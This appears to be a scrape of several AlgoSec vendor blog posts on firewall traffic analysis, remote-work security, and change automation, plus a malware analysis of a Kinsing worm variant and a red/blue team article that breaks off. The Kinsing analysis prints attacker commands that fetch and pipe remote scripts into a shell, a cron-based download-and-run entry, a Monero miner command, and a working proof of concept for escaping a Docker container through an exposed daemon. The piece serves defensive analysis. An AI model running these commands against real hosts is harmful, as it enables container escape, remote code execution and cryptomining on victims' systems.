Search results

What is Firewall Traffic Analysis? Firewall traffic analysis (FTA) is a network security operation that grants visibility into the data packets that travel through your network’s firewalls. Cybersecurity professionals conduct firewall traffic analysis as part of wider network traffic analysis (NTA) workflows. The traffic monitoring data they gain provides deep visibility into how attacks can penetrate your network and what kind of damage threat actors can do once they succeed. NTA vs. FTA... Firewall Policy Management Firewall Traffic Analysis: The Complete Guide Asher Benbenisty 2 min read Asher Benbenisty Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/24/23 Published What is Firewall Traffic Analysis? Firewall traffic analysis (FTA) is a network security operation that grants visibility into the data packets that travel through your network’s firewalls. Cybersecurity professionals conduct firewall traffic analysis as part of wider network traffic analysis (NTA) workflows. The traffic monitoring data they gain provides deep visibility into how attacks can penetrate your network and what kind of damage threat actors can do once they succeed. NTA vs. FTA Explained NTA tools provide visibility into things like internal traffic inside the data center, inbound VPN traffic from external users, and bandwidth metrics from Internet of Things (iOT) endpoints. They inspect on-premises devices like routers and switches, usually through a unified, vendor-agnostic interface. Network traffic analyzers do inspect firewalls, but might stop short of firewall-specific network monitoring and management. FTA tools focus more exclusively on traffic patterns through the organization’s firewalls. They provide detailed information on how firewall rules interact with traffic from different sources. This kind of tool might tell you how a specific Cisco firewall conducts deep packet inspection on a certain IP address, and provide broader metrics on how your firewalls operate overall. It may also provide change management tools designed to help you optimize firewall rules and security policies . Firewall Rules Overview Your firewalls can only protect against security threats effectively when they are equipped with an optimized set of rules. These rules determine which users are allowed to access network assets and what kind of network activity is allowed. They play a major role in enforcing network segmentation and enabling efficient network management. Analyzing device policies for an enterprise network is a complex and time-consuming task. Minor mistakes can lead to critical risks remaining undetected and expose network devices to cyberattacks. For this reason, many security leaders use automated risk management solutions that include firewall traffic analysis. These tools perform a comprehensive analysis of firewall rules and communicate the risks of specific rules across every device on the network. This information is important because it will inform the choices you make during real-time traffic analysis. Having a comprehensive view of your security risk profile allows you to make meaningful changes to your security posture as you analyze firewall traffic. Performing Real-Time Traffic Analysis AlgoSec Horizon Security Analyzer captures information on the following traffic types: External IP addresses Internal IP addresses (public and private, including NAT addresses) Protocols (like TCP/IP, SMTP, HTTP, and others) Port numbers and applications for sources and destinations Incoming and outgoing traffic Potential intrusions The platform also supports real-time network traffic analysis and monitoring. When activated, it will periodically inspect network devices for changes to their policy rules, object definitions, audit logs, and more. You can view the changes detected for individual devices and groups, and filter the results to find specific network activities according to different parameters. For any detected change, Horizon Security Analyzer immediately aggregates the following data points: Device – The device where the changes happened. Date/Time – The exact time when the change was made. Changed by – Tells you which administrator performed the change. Summary – Lists the network assets impacted by the change. Many devices supported by Horizon Security Analyzer are actually systems of devices that work together. You can visualize the relationships between these assets using the device tree format. This presents every device as a node in the tree, giving you an easy way to manage and view data for individual nodes, parents nodes, and global categories. For example, Horizon Security Analyzer might discover a redundant rule copied across every firewall in your network. If its analysis shows that the rule triggers frequently, it might recommend moving to a higher node on the device tree. If it turns out the rule never triggers, it may recommend adjusting the rule or deleting it completely. If the rule doesn’t trigger because it conflicts with another firewall rule, it’s clear that some action is needed. Importance of Visualization and Reporting Open source network analysis tools typically work through a command-line interface or a very simple graphic user interface. Most of the data you can collect through these tools must be processed separately before being communicated to non-technical stakeholders. High-performance firewall analysis tools like AlgoSec Horizon Security Analyzer provide additional support for custom visualizations and reports directly through the platform. Visualization allows non-technical stakeholders to immediately grasp the importance of optimizing firewall policies, conducting netflow analysis, and improving the organization’s security posture against emerging threats. For security leaders reporting to board members and external stakeholders, this can dramatically transform the success of security initiatives. AlgoSec Horizon Security Analyzer includes a Visualize tab that allows users to create custom data visualizations. You can save these visualizations individually or combine them into a dashboard. Some of the data sources you can use to create visualizations include: Interactive searches Saved searches Other saved visualizations Traffic Analysis Metrics and Reports Custom visualizations enhance reports by enabling non-technical audiences to understand complex network traffic metrics without the need for additional interpretation. Metrics like speed, bandwidth usage, packet loss, and latency provide in-depth information about the reliability and security of the network. Analyzing these metrics allows network administrators to proactively address performance bottlenecks, network issues, and security misconfigurations. This helps the organization’s leaders understand the network’s capabilities and identify the areas that need improvement. For example, an organization that is planning to migrate to the cloud must know whether its current network infrastructure can support that migration. The only way to guarantee this is by carefully measuring network performance and proactively mitigating security risks. Network traffic analysis tools should do more than measure simple metrics like latency. They need to combine latency into complex performance indicators that show how much latency is occuring, and how network conditions impact those metrics. That might include measuring the variation in delay between individual data packets (jitter), Packet Delay Variation (PDV), and others. With the right automated firewall analysis tool, these metrics can help you identify and address security vulnerabilities as well. For example, you could automate the platform to trigger alerts when certain metrics fall outside safe operating parameters. Exploring AlgoSec’s Network Traffic Analysis Tool AlgoSec Horizon Security Analyzer provides a wide range of operations and optimizations to security teams operating in complex environments. It enables firewall performance improvements and produces custom reports with rich visualizations demonstrating the value of its optimizations. Some of the operations that Horizon Security Analyzer supports include: Device analysis and change tracking reports. Gain in-depth data on device policies, traffic, rules, and objects. It analyzes the routing table that produces a connectivity diagram illustrating changes from previous reports on every device covered. Traffic and routing queries. Run traffic simulations on specific devices and groups to find out how firewall rules interact in specific scenarios. Troubleshoot issues that emerge and use the data collected to prevent disruptions to real-world traffic. This allows for seamless server IP migration and security validation. Compliance verification and reporting. Explore the policy and change history of individual devices, groups, and global categories. Generate custom reports that meet the requirements of corporate regulatory standards like Sarbanes-Oxley, HIPAA, PCI DSS, and others. Rule cleanup and auditing. Identify firewall rules that are either unused, timed out, disabled, or redundant. Safely remove rules that fail to improve your security posture, improving the efficiency of your firewall devices. List unused rules, rules that don’t conform to company policy, and more. Horizon Security Analyzer can even re-order rules automatically, increasing device performance while retaining policy logic. User notifications and alerts. Discover when unexpected changes are made and find out how those changes were made. Monitor devices for rule changes and send emails to pre-assigned users with device analyses and reports. Network Traffic Analysis for Threat Detection and Response By monitoring and inspecting network traffic patterns, firewall analysis tools can help security teams quickly detect and respond to threats. Layer on additional technologies like Intrusion Detection Systems (IDS), Network Detection and Response (NDR), and Threat Intelligence feeds to transform network analysis into a proactive detection and response solution. IDS solutions can examine packet headers, usage statistics, and protocol data flows to find out when suspicious activity is taking place. Network sensors may monitor traffic that passes through specific routers or switches, or host-based intrusion detection systems may monitor traffic from within a host on the network. NDR solutions use a combination of analytical techniques to identify security threats without relying on known attack signatures. They continuously monitor and analyze network traffic data to establish a baseline of normal network activity. NDR tools alert security teams when new activity deviates too far from the baseline. Threat intelligence feeds provide live insight on the indicators associated with emerging threats. This allows security teams to associate observed network activities with known threats as they develop in real-time. The best threat intelligence feeds filter out the huge volume of superfluous threat data that doesn’t pertain to the organization in question. Firewall Traffic Analysis in Specific Environments On-Premises vs. Cloud-hosted Environments Firewall traffic analyzers exist in both on-premises and cloud-based forms. As more organizations migrate business-critical processes to the cloud, having a truly cloud-native network analysis tool is increasingly important. The best of these tools allow security teams to measure the performance of both on-premises and cloud-hosted network devices, gathering information from physical devices, software platforms, and the infrastructure that connects them. Securing the Internet of Things It’s also important that firewall traffic analysis tools take Internet of Things (IoT) devices in consideration. These should be grouped separately from other network assets and furnished with firewall rules that strictly segment them. Ideally, if threat actors compromise one or more IoT devices, network segmentation won’t allow the attack to spread to other parts of the network. Conducting firewall analysis and continuously auditing firewall rules ensures that the barriers between network segments remain viable even if peripheral assets (like IoT devices) are compromised. Microsoft Windows Environments Organizations that rely on extensive Microsoft Windows deployments need to augment the built-in security capabilities that Windows provides. On its own, Windows does not offer the kind of in-depth security or visibility that organizations need. Firewall traffic analysis can play a major role helping IT decision-makers deploy technologies that improve the security of their Windows-based systems. Troubleshooting and Forensic Analysis Firewall analysis can provide detailed information into the causes of network problems, enabling IT professionals to respond to network issues more quickly. There are a few ways network administrators can do this: Analyzing firewall logs. Log data provides a wealth of information on who connects to network assets. These logs can help network administrators identify performance bottlenecks and security vulnerabilities that would otherwise go unnoticed. Investigating cyberattacks. When threat actors successfully breach network assets, they can leave behind valuable data. Firewall analysis can help pinpoint the vulnerabilities they exploited, providing security teams with the data they need to prevent future attacks. Conducting forensic analysis on known threats. Network traffic analysis can help security teams track down ransomware and malware attacks. An organization can only commit resources to closing its security gaps after a security professional maps out the killchain used by threat actors to compromise network assets. Key Integrations Firewall analysis tools provide maximum value when integrated with other security tools into a coherent, unified platform. Security information and event management (SIEM) tools allow you to orchestrate network traffic analysis automations with machine learning-enabled workflows to enable near-instant detection and response. Deploying SIEM capabilities in this context allows you to correlate data from different sources and draw logs from devices across every corner of the organization – including its firewalls. By integrating this data into a unified, centrally managed system, security professionals can gain real-time information on security threats as they emerge. AlgoSec’s Horizon Security Analyzer integrates seamlessly with leading SIEM solutions, allowing security teams to monitor, share, and update firewall configurations while enriching security event data with insights gleaned from firewall logs. Horizon Security Analyzer uses a REST API to transmit and receive data from SIEM platforms, allowing organizations to program automation into their firewall workflows and manage their deployments from their SIEM. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Recommendations from Rajpreet Kaur, Senior Principal Analyst at Gartner, in her recent blog on remote working, and a perspective on how... Security Policy Management Deploying NSPM to Implement a Gartner Analyst’s Work from Home Network Security Advice Jeffrey Starr 2 min read Jeffrey Starr Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 4/27/20 Published Recommendations from Rajpreet Kaur, Senior Principal Analyst at Gartner, in her recent blog on remote working, and a perspective on how Network Security Policy Management systems can help enterprises act upon this guidance The COVID-19 pandemic has been the catalyst for a global migration to remote home working. Managing and mitigating the network security risks this presents, on such an unprecedented scale and for a long period of time, poses a significant challenge even for companies that had remote access working plans in place before the pandemic. Not only are cybercriminals taking advantage of network insecurities to leverage attacks, they are also exploiting human anxiety around the crisis to break through security barriers. In fact, a recent survey found that 40 percent of companies reported seeing increased cyberattacks as they enable remote working. So how should organizations manage their security during these massive changes in network usage? In a recent blog , Rajpreet Kaur , Gartner Senior Principal Analyst, and a specialized expert on both hybrid environment network security and NSPM tools, offered recommendations to organizations on how to handle remote infrastructure security challenges, many of which closely align with a focus on network policy automation and application security. Here’s how network security policy management systems can support and enable Rajpreet Kaur’s key recommendations. 1. Don’t panic and start moving things to the cloud without a proper architectural design in place. Panicking and starting a large-scale move to the cloud without a proper plan in place can lead to poor security controls and ill-prepared migration. Before moving to the cloud, organizations must consider their network’s architectural design, which should always start with analysis. The analytical and discovery capabilities of NSPM systems automate this process by discovering and mapping network connectivity and providing a network map, which helps you to understand your network components, making migrations easier, faster and glitch-free. 2. Design a proper network security architecture and plan considering limited disruption and supporting work from home. Implementing these immediate and urgent network changes can only be done effectively and securely with robust change management processes. As with network analysis, NSPM automation capabilities are also vital in rapid change management. Security automation dramatically accelerates change processes, with request generation to implementation time drastically shortened and enables better enforcement and auditing for regulatory compliance. It also helps organizations overcome skill gaps and staffing limitations, which may have already been impacted by the current crisis. NSPM solutions enable full end-to-end change analysis and automation, including what if security checks, automation design, push of changes, and full documentation and audit trail. This ensures that changes can be implemented rapidly, and applied consistently and efficiently, with a full audit trail of every change. 3. Plan for what you need now, don’t try to implement a long-term strategic solution to fix your immediate needs. The current widespread move to home working is adding an extra layer of complexity to remote network security, since organizations are finding themselves having to implement new security policies and roll out adoption in a very short timeframe. Considering this, it’s important for organizations to focus on short-term needs, rather than attempting to develop a long-term strategic solution. Trying to develop a long-term solution in such a short window can be overwhelming and increase the risk of opening security vulnerabilities. Using NSPM speeds up the configuration and implementation process, allowing you to get your remote network security firewall policies up and running as soon as possible, with minimum disruption to your remote workforce. Once you have dealt with the critical immediate needs, you can then focus on developing a more long-term strategy. 4. Try to support your existing work from home employees by doing minimal changes to the existing architecture, like meeting throughput requirements and upgrading the equipment or restricting the access to a group of employees at times. Managing application connectivity and accessibility is key to ensuring minimal work disruption as employees move to remote working. An effective NSPM solution allows you to discover, identify and map business applications to ensure that they are safe and have the necessary connectivity flows. Having such a view of all the applications that are accessing the network allows security teams to map the workflow and provides visibility of the application’s required connectivity in order to minimise outages. 5. For any new network changes and upgrades, or new deployments, consider developing a work from home first strategy. Developing a work from home (WFH) strategy has never been more essential. The challenge is that WFH is a more vulnerable environment; employees are accessing sensitive data from a range of home devices, via outside networks, that may not have the same security controls. On top of this, cyber threats have already seen a sharp increase as cybercriminals exploit the widespread anxiety and vulnerabilities caused by the global crisis. IT security and networking staff are therefore having to do more, with the same staffing levels, whilst also navigating the challenges of doing this remotely from home. NSPM capabilities can help in overcoming these WFH issues. Security teams may, for example, need to change many Firewall rules to allow secure access to sensitive data. An effective NSPM solution can facilitate this and enable fast deployment by providing the ability to make changes to applications’ firewall openings from a single management interface. 6. Enhance security around public facing applications to protect against COVID-19 related cyber-attacks. With the move to remote working, organizations are increasingly relying on applications to carry out their work from home. Ensuring that business-critical applications stay available and secure while shifting to remote work is key to avoiding workflow disruption. It’s essential to take an application centric approach to application security, and an effective NSPM solution can help you to better manage and secure your business-critical applications . As discussed above, application visibility is key here. NSPM systems provides comprehensive application visibility, security operation teams can monitor critical applications for risks and vulnerabilities to ensure that they are safe. Gartner’s Rajpreet Kaur has delivered a good combination of practical and timely guidance along with the logical insights underlying the useful recommendations. These tips bring helpful guidance on the Work from Home security challenge that stands out for its clear relevance when there is now so much other noise out there. A robust NSPM can help you rapidly implement these invaluable recommendations. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Avivi Siman-Tov, Director of Product Management at AlgoSec, discusses the benefits of network automation and takes us through a... Firewall Change Management Change automation: A step-by-step guide to network security policy change management Avivi Siman Tov 2 min read Avivi Siman Tov Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/21/21 Published Avivi Siman-Tov, Director of Product Management at AlgoSec, discusses the benefits of network automation and takes us through a step-by-step process to standardize change management In today’s fast-paced, data-driven environment, the only constant that businesses can bank on is change. For organizations to function and compete in the modern digital landscape, they need their data to be able to move freely and unobstructed through every branch of their business, unimpeded by security issues that require constant manual attention. The network is arguably the beating heart of an organization but keeping it ticking requires more maintenance than it once did, owing to constantly changing risk profiles and circumstances. That’s why a greater number of businesses are turning to change automation to bridge the gap between network alerts and the action that needs to be taken. Barriers to automation According to Gartner , organizations that can automate more than 70% of their network changes can reduce the number of outages by at least 50% and deliver services up to 50% faster. That’s because a lot of legacy solutions tend to take a reactive rather than proactive approach to dealing with security. There are multiple controls in place that simply don’t talk to each other. While most businesses get alerts from SIEM solutions and vulnerability scanners, responding to them turns into a full-time job, distracting your team from other important work they could be doing. Most organizations know that manual policy changes impact their productivity, but they’re afraid to take the leap to automation because of an ill-placed perception around security. Production environments in all organizations are maintained by different teams — for example, DevOps, maintenance, cloud security, IT, and more. Not all of these teams are educated to the same level in security matters, and some see it as a constraint that slows their work. This can lead to conflict between teams, which means that automation is not always welcome. Despite some resistance to change, enterprise-wide change automation makes it possible to transform network security policies without needing to reinvent the wheel or replace existing business processes. Automation and actionable intelligence are proven to enhance security and business agility without the stress often associated with misconfigurations caused by manual, ad-hoc processes. A typical network change workflow By elevating firewall change management from a manual, arduous task to a fully automated, zero-touch process, networks can become more agile and organizations far more adaptive. There are several steps that organizations need to take towards complete network security automation, from a simple change request through to implementation and validation. Let’s take a look at the most common steps in establishing automation for a simple change request. Step 1 – Request a network change Every change begins with a request. At this stage, you need to clarify who is asking for the amendment and why because sometimes the request is unnecessary or covered by an existing ruleset. Step 2 – Find relevant security devices Once this request is translated, the change automation platform will handle the request and implement the changes to hybrid networks. The administrator will be able to see which firewall and routing devices are involved and what impact the change will have. Step 3 – Plan change The change automation platform understands how to deal with different vendor-specific settings and how to implement the requests in a way that avoids creating any duplicates. Step 4 – Risk check The administrator will get a ‘ what if’ analysis, which checks the change for any risks. In this phase, the decision as to whether to allow the change and expose the network to the risk mentioned is in the hands of the network admin or security manager, depending on who is handling this phase. Step 5 – Push change to device Once planned changes are approved, the ‘magic’ happens. The change automation platform implements and pushes the changes to the desired devices automatically, either through APIs or directly to the device (CLI). This is a fully automated action that can be conducted on multiple devices, whether cloud-based or on-premises. The push can be done in a scheduled manner, in your maintenance window, or on-demand. Step 6 – Validate change At the end of each request, the solution will check that the request was successfully implemented across all devices. The solution also provides ongoing audits of the whole process, enabling easy checking of each stage. Step 7 – Documentation and logging Network security automation platforms can provide you with a full, automated audit trail. Documentation happens on the go, saving IT and security teams time and accelerating tedious network compliance management tasks. Put your trust in network automation While change management is complex stuff, the decision for your business is simple. It’s like the engine of an expensive car. Would you drive at high speeds if you didn’t have your brakes tested or a steering wheel to keep your course straight? Hopefully, the answer is no. With AlgoSec FireFlow , you can automate the security policy change process without introducing any element of risk, vulnerability, or compliance violation. AlgoSec FireFlow allows you to analyze every change before it is introduced, and validate successful changes as intended, all within your existing IT Service Management (ITSM) solutions . By putting your trust in us we can put you firmly in the driving seat with zero-touch change management and secure application deployment. For more information, or to arrange a demo , visit our website . Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Azure security best practices checklist Download PDF Download PDF Add a Title Add a Title Add a Title Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue Talk to a Skybox transition expert. Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

LA SOLUCIÓN DE GESTIÓN DE SEGURIDAD Download PDF Download PDF Add a Title Add a Title Add a Title Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue Talk to a Skybox transition expert. Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Cybersecurity is an ever prevalent issue. Malicious hackers are becoming more agile by using sophisticated techniques that are always... Cloud Security Prevasio’s Role in Red Team Exercises and Pen Testing Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 12/21/20 Published Cybersecurity is an ever prevalent issue. Malicious hackers are becoming more agile by using sophisticated techniques that are always evolving. This makes it a top priority for companies to stay on top of their organization’s network security to ensure that sensitive and confidential information is not leaked or exploited in any way. Let’s take a look at the Red/Blue Team concept, Pen Testing, and Prevasio’s role in ensuring your network and systems remain secure in a Docker container atmosphere. What is the Red/Blue Team Concept? The red/blue team concept is an effective technique that uses exercises and simulations to assess a company’s cybersecurity strength. The results allow organizations to identify which aspects of the network are functioning as intended and which areas are vulnerable and need improvement. The idea is that two teams (red and blue) of cybersecurity professionals face off against each other. The Red Team’s Role It is easiest to think of the red team as the offense. This group aims to infiltrate a company’s network using sophisticated real-world techniques and exploit potential vulnerabilities. It is important to note that the team comprises highly skilled ethical hackers or cybersecurity professionals. Initial access is typically gained by stealing an employee’s, department, or company-wide user credentials. From there, the red team will then work its way across systems as it increases its level of privilege in the network. The team will penetrate as much of the system as possible. It is important to note that this is just a simulation, so all actions taken are ethical and without malicious intent. The Blue Team’s Role The blue team is the defense. This team is typically made up of a group of incident response consultants or IT security professionals specially trained in preventing and stopping attacks. The goal of the blue team is to put a stop to ongoing attacks, return the network and its systems to a normal state, and prevent future attacks by fixing the identified vulnerabilities. Prevention is ideal when it comes to cybersecurity attacks. Unfortunately, that is not always possible. The next best thing is to minimize “breakout time” as much as possible. The “breakout time” is the window between when the network’s integrity is first compromised and when the attacker can begin moving through the system. Importance of Red/Blue Team Exercises Cybersecurity simulations are important for protecting organizations against a wide range of sophisticated attacks. Let’s take a look at the benefits of red/blue team exercises: Identify vulnerabilities Identify areas of improvement Learn how to detect and contain an attack Develop response techniques to handle attacks as quickly as possible Identify gaps in the existing security Strengthen security and shorten breakout time Nurture cooperation in your IT department Increase your IT team’s skills with low-risk training What are Pen Testing Teams? Many organizations do not have red/blue teams but have a Pen Testing (aka penetration testing) team instead. Pen testing teams participate in exercises where the goal is to find and exploit as many vulnerabilities as possible. The overall goal is to find the weaknesses of the system that malicious hackers could take advantage of. Companies’ best way to conduct pen tests is to use outside professionals who do not know about the network or its systems. This paints a more accurate picture of where vulnerabilities lie. What are the Types of Pen Testing? Open-box pen test – The hacker is provided with limited information about the organization. Closed-box pen test – The hacker is provided with absolutely no information about the company. Covert pen test – In this type of test, no one inside 